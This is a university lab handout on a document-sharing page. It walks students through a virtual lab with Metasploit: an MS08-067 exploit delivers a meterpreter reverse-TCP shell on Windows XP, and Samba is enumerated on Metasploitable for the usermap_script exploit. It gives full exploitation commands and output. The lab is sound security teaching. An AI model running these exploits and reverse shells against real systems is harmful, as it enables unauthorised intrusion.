Metasploit Lab: Attacking Windows XP and Linux Targets



Similar documents
Metasploit Beginners

AUTHOR CONTACT DETAILS

Monitor and Secure Linux System with Open Source Tripwire

How to hack a website with Metasploit

Author: Sumedt Jitpukdebodin. Organization: ACIS i-secure. ID: My Blog:

NCS 430 Penetration Testing Lab #2 Tuesday, February 10, 2015 John Salamy

Exploiting Transparent User Identification Systems

Metasploit Framework Unleashed beyond Metasploit

Lab 12: Mitigation and Deterrent Techniques - Anti-Forensic

CIT 480: Securing Computer Systems. Vulnerability Scanning and Exploitation Frameworks

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

60467 Project 1. Net Vulnerabilities scans and attacks. Chun Li

Automated Penetration Testing with the Metasploit Framework. NEO Information Security Forum March 19, 2008

Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

1 Scope of Assessment

1. LAB SNIFFING LAB ID: 10

1 Download & Installation Usernames and... Passwords

Automation of Post-Exploitation

Metasploit: Penetration Testing in a Virtual Environment. (Final Draft) Christopher Steiner. Dr. Janusz Zalewski. CNT 4104 Fall 2011 Networks

Vulnerability Assessment and Penetration Testing

(maybe?)apt1: technical backstage

Comodo MyDLP Software Version 2.0. Installation Guide Guide Version Comodo Security Solutions 1255 Broad Street Clifton, NJ 07013

Tcpdump Lab: Wired Network Traffic Sniffing

Penetration Testing Report Client: Business Solutions June 15 th 2015

Lab 10: Security Testing Linux Server

Penetration Testing LAB Setup Guide

MIEIC - SSIN (Computer Security)

Penetration Testing with Kali Linux

User Manual of the Pre-built Ubuntu 9 Virutal Machine

Metasploit Unleashed. Class 2: Information Gathering and Vulnerability Scanning. Georgia Weidman Director of Cyberwarface, Reverse Space

HONEYD (OPEN SOURCE HONEYPOT SOFTWARE)

Lab Objectives & Turn In

Using Virtual Machines

Introduction to Operating Systems

Armitage. Part 1. Author : r45c4l Mail : infosecpirate@gmail.com.

Metasploit ing the target machine is a fascinating subject to all security professionals. The rich list of exploit codes and other handy modules of

IDS and Penetration Testing Lab II

Vulnerability analysis

Step 1 - Change VMware to use the same subnet in the labs /24

Port Scanning. Objectives. Introduction: Port Scanning. 1. Introduce the techniques of port scanning. 2. Use port scanning audit tools such as Nmap.

Virtual Learning Tools in Cyber Security Education

How To Set Up A Network Map In Linux On A Ubuntu 2.5 (Amd64) On A Raspberry Mobi) On An Ubuntu (Amd66) On Ubuntu 4.5 On A Windows Box

Addonics T E C H N O L O G I E S. NAS Adapter. Model: NASU Key Features

Penetration Testing Using The Kill Chain Methodology

IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection

Web Application Firewall

IEEE bg Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dbm

User Manual of the Pre-built Ubuntu Virutal Machine

User s Manual. Copyright 2010 Vantec Thermal Technologies. All Rights Reserved.

Firewalls and Software Updates

Course Duration: 80Hrs. Course Fee: INR (Certification Lab Exam Cost 2 Attempts)

Mapping ITS s File Server Folder to Mosaic Windows to Publish a Website

Remote Desktop Administration

Sharp Remote Device Manager (SRDM) Server Software Setup Guide

Penetration Testing LAB Setup Guide

Novell Open Workgroup Suite

Post Exploitation. n00bpentesting.com

EZblue BusinessServer The All - In - One Server For Your Home And Business

Installation Overview

Deploying BitDefender Client Security and BitDefender Windows Server Solutions

Integrated Virtual Debugger for Visual Studio Developer s Guide VMware Workstation 8.0

Other documents in this series are available at: servernotes.wazmac.com

READYNAS INSTANT STORAGE. Quick Installation Guide

Intrusion Detection and Prevention: Network and IDS Configuration and Monitoring using Snort

Virtual machine W4M- Galaxy: Installation guide

Lab 1: Network Devices and Technologies - Capturing Network Traffic

EZblue BusinessServer The All - In - One Server For Your Home And Business

HOWTO: Set up a Vyatta device with ThreatSTOP in router mode

1. Installation Overview

WA2192 Introduction to Big Data and NoSQL. Classroom Setup Guide. Web Age Solutions Inc. Copyright Web Age Solutions Inc. 1

HP SDN VM and Ubuntu Setup

Server Configuration and Deployment (part 1) Lotus Foundations Essentials

Security Correlation Server Quick Installation Guide

Penetration Testing. What Is a Penetration Testing?

Workshop. From XSS to Domain Admin. Black Hat Sessions 18 juni 2015 Jordy Kersten - Mandy van Oosterhout - Ward Wouts

SETTING UP AND USING A CYBER SECURITY LAB FOR EDUCATION PURPOSES *

HOWTO: Set up a Vyatta device with ThreatSTOP in bridge mode

CS 326e F2002 Lab 1. Basic Network Setup & Ethereal Time: 2 hrs

Linux Boot Camp. Our Lady of the Lake University Computer Information Systems & Security Department Kevin Barton Artair Burnett

The Metasploit. Framework

Deploying BitDefender Client Security and BitDefender Windows Server Solutions

Kautilya: Teensy beyond shells

Verax Service Desk Installation Guide for UNIX and Windows

embeo Getting Started and Samples

for Networks Installation Guide for the application on the server July 2014 (GUIDE 2) Lucid Rapid Version 6.05-N and later

MSRPC NULL sessions. Exploitation and protection. Jean-Baptiste Marchand

Exercise 7 Network Forensics

ThinPoint Quick Start Guide

Penetration Testing Walkthrough

Vulnerability Assessment Lab

FREQUENTLY ASKED QUESTIONS

PRINT CONFIGURATION. 1. Printer Configuration

STABLE & SECURE BANK lab writeup. Page 1 of 21

Basic Security Testing with Kali Linux

Medical Device Security Health Imaging Digital Capture. Security Assessment Report for the Kodak Capture Link Server V1.00

for Networks Installation Guide for the application on the server August 2014 (GUIDE 2) Lucid Exact Version 1.7-N and later

Volume SYSLOG JUNCTION. User s Guide. User s Guide

STUDY PAPER ON PENETRATION TESTING METHODOLOGIES

Symantec Cyber Readiness Challenge Player s Manual

Transcription:

Cyber Forensics Laboratory 1 Metasploit Lab: Attacking Windows XP and Linux Targets Copyright c 2012 Michael McGinty and Xinwen Fu, University of Massachusetts Lowell Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.2 or any later version published by the Free Software Foundation. A copy of the license can be found at http://www.gnu.org/licenses/fdl.html. 1 Lab Overview This lab will introduce students to a popular exploitation framework, Metasploit, and its usage within a virtualized environment. Students are assumed to be comfortable using a command line interface. Students will attack two targets: The first, an unpatched Windows XP SP3 virtual machine, must be acquired by the student. It s worth noting that Windows XP can be used for 30 days after installation without being registered, so a license key is not necessarily needed. A full set of instruction The second will be a Linux virtual machine, in this case Metasploitable. For the attacking machine, students should use the modified version of Wenliang Du s SEEDUbuntu prepared especially for this lab, available at http://ccf.cs.uml.edu/ Before continuing, students should have their virtualization environment prepared, and the Windows XP, SEEDUbuntu and Metasploitable VMs installed and networked properly per the instructions available at http://ccf.cs.uml.edu/ Please note that this lab assumes VMWare Workstation is being used. The principles are the same among other virtualization software, but terminology and features may change. Some alternatives to VMWare Workstation include Virtualbox, VMWare Player, and Microsoft Virtual PC. 2 Task 1 Please follow the instructions below and complete the task. Use screen shots to demonstrate the success with the attack. For each screen shot, students must explain it means. 2.1 Getting Started Terminal and Root Shells Login to the SEEDUbuntu machine after booting it up ( user:pass is seed:dees) and open up a root terminal. Open the terminal shortcut on the desktop and then use the su command. ( The root password is seedubuntu ) seed@seed-desktop: $ su Password: root@seed-desktop:/home/seed# Root shells are denoted by a hash-mark ( # ), compared to a normal shell ( $ ). For the purposes of this lab, we assume all commands are run with root privileges unless specified otherwise.

Cyber Forensics Laboratory 2 Networking: Now that we have a root shell, run the dhclient command, to get an IP address from the VMWare DHCP server. It should look similar to this: root@seed-desktop: # dhclient Internet Systems Consortium DHCP Client V3.1.1 Copyright 2004-2008 Internet Systems Consortium. All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/ Listening on LPF/eth6/00:0c:29:78:f4:6a Sending on LPF/eth6/00:0c:29:78:f4:6a Sending on Socket/fallback DHCPREQUEST of 192.168.170.128 on eth6 to 255.255.255.255 port 67 DHCPACK of 192.168.170.128 from 192.168.170.254 bound to 192.168.170.128 -- renewal in 799 seconds. root@seed-desktop: # Notice the network: 192.168.170.0/24 in this case. Our Windows XP and Metasploitable machines should be on the same network. Confirm this with a ipconfig on the Windows XP machine, and ifconfig on the Metasploitable machine. If they re not on the same network, adjust their network connections from Network Adapter in Virtual Machine Settings to be both either NAT or Host-only. If any other problems are encountered, please refer to the lab setup instructions available on ccf.cs.uml.edu or contact your instructor. The network and IP addresses might be different for students, but in our case, the Windows XP VM is at 192.168.170.130, and Metasploitable is at 192.168.170.133. Don t forget to disable the Windows Firewall on the Windows XP machine, as per the lab setup instructions. Confirm your VMs can talk to each other by pinging each in turn like this: seed@seed-desktop: $ ping 192.168.170.130 PING 192.168.170.130 (192.168.170.130) 56(84) bytes of data. 64 bytes from 192.168.170.130: icmp_seq=1 ttl=64 time=3.02 ms 64 bytes from 192.168.170.130: icmp_seq=2 ttl=64 time=0.163 ms 64 bytes from 192.168.170.130: icmp_seq=3 ttl=64 time=0.474 ms 64 bytes from 192.168.170.130: icmp_seq=4 ttl=64 time=0.198 ms or with a quick nmap scan: root@seed-desktop:/home/seed# nmap 192.168.170.130 Starting Nmap 4.76 ( http://nmap.org ) at 2012-09-24 01:22 EDT Interesting ports on 192.168.170.130: Not shown: 997 closed ports PORT STATE SERVICE 135/tcpopen msrpc 139/tcpopen netbios-ssn 445/tcpopen microsoft-ds MAC Address: 00:0C:29:33:83:3A (VMware) Nmap done: 1 IP address (1 host up) scanned in 14.46 seconds

Cyber Forensics Laboratory 3 2.2 Using Metasploit Runtime Options: Metasploit has a variety of interfaces, among them a CLI, msfcli; a shell, msfconsole; and even a GUI, armitage. All work well, and all can be used for this lab, but instructions will assume msfconsole is being used. Refer to the Metasploit documentation for more info on other interfaces. Now run msfconsole from a root shell. It may take a while, depending on a number of factors, so be patient. It should look somewhat like this: root@seed-desktop: # msfconsole # cowsay++ < metasploit > ------------ \,, \ (oo) ( ) )\ -- * =[ metasploit v4.4.0-dev [core:4.4 api:1.0] + -- --=[ 840 exploits - 471 auxiliary - 142 post + -- --=[ 250 payloads - 27 encoders - 8 nops msf > You re now at the msf shell, ready to run exploits. Windows and the MS08-067 netapi Vulnerability First, some quick familiarization: msfconsole allows you to run normal system commands from within the msf shell (try the w command, for instance). irb will provide an interactive ruby shell. set allows the user to set variables within the framework: We ll be using this later. unset does the opposite, naturally. unset all will do exactly that, unset all defined variables. help is the built-in help for the framework s commands, this will answer most of your questions. Use the help tool to learn about set, sessions, use, info, and back, as well as any others that catch your eye. When you re ready, load up the MS08-067 module. Aside: msfconsole does support tabcompletion.

Cyber Forensics Laboratory 4 msf > search ms08-067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft... msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > Notice the prompt changed to reflect the current module. Run the info command, and read a little. Then run show options There are a couple parameters we need to set before we can exploit our Windows XP machine at 192.168.170.130: LHOST, PAYLOAD, and the current modules required options, in this case just RHOST: msf exploit(ms08_067_netapi) > set RHOST 192.168.170.130 RHOST => 192.168.170.130 PAYLOAD allows us to specify what we want to deliver when we instruct the framework to exploit our target. We can use show options to display all possible payloads that we can use (following is part of them): msf exploit(ms08_067_netapi) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Descri ---- --------------- ---- ------ generic/custom normal Custom generic/debug_trap normal Generi generic/shell_bind_tcp normal Generi generic/shell_reverse_tcp normal Generi generic/tight_loop normal Generi Do we want to have the target listen and wait for us to connect? To connect back to us? We have a wide variety of options, including the ability to use a payload called Meterpreter that makes post exploitation easy. We ll be using Meterpreter, and have it connect back to us, so define your variables like so: msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp Run show options to check if we are all set, it turns out that we still need to set LHOST for payload. msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi):

Cyber Forensics Laboratory 5 Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.170.130 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi) > set LHOST 192.168.170.128 LHOST => 192.168.170.128 Check if it all goes well, then exploit the target. msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on 192.168.170.128:4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 3 - lang:english [*] Selected Target: Windows XP SP3 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.170.130 [*] Meterpreter session 1 opened (192.168.170.128:4444 -> 192.168.170... meterpreter > So we have a meterpreter shell on the remote host, meaning we ve successfully exploited Windows XP, and can do any evil things we want. help will give context sensitive help for meterpreter commands, make sure to take a look. There re plenty of tools and scripts that make post exploitation tasks very easy and fast. For those more familiar with the Windows command line, see the shell command: meterpreter > shell Process 1048 created. Channel 2 created. Microsoft Windows XP [Version 5.1.2600]

Cyber Forensics Laboratory 6 (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> Thus concludes our attack on Windows XP. 3 Task 2 Please follow the following instructions and complete the task. Use screen shots to demonstrate the success with the attack. For each screen shot, students must explain it means. In this task, students have to figure out some Metasploit commands on their own to complete the task. For the Metasploitable section, make sure the two machines are networked together properly, and that they can talk to each other. Once that s done, fire up msfconsole again, and run a network scan of your choice. Note the Samba 3.x service running. We ll look for an exploit that might work, but first, what version of Samba is running? root@seed-desktop: # smbclient -L 192.168.170.133 -N Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] Server Comment --------- ------- METASPLOITABLE metasploitable server (Samba 3.0.20-Debian) Workgroup Master --------- ------- WORKGROUP METASPLOITABLE root@seed-desktop: # This gave us a lot of information, as well as the version, 3.0.20-Debian. Let s find an exploit... msf > search type:exploit port:139 Matching Modules ================

Cyber Forensics Laboratory 7 Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Ov exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply M exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Ov exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2-2.2.6 exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Ov exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Ov exploit/windows/ids/snort_dce_rpc 2007-02-19 good Snort 2 DCE/RPC pre msf > The info command on exploit/multi/samba/usermap_script indicates This module exploits a command execution vulerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" configuration option. This tells us that it s vulnerable, or at least likely to be. Lab requirements: Give a brief introduction to what is Samba? Please list the commands that will give a root shell with the attack against Samba.

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information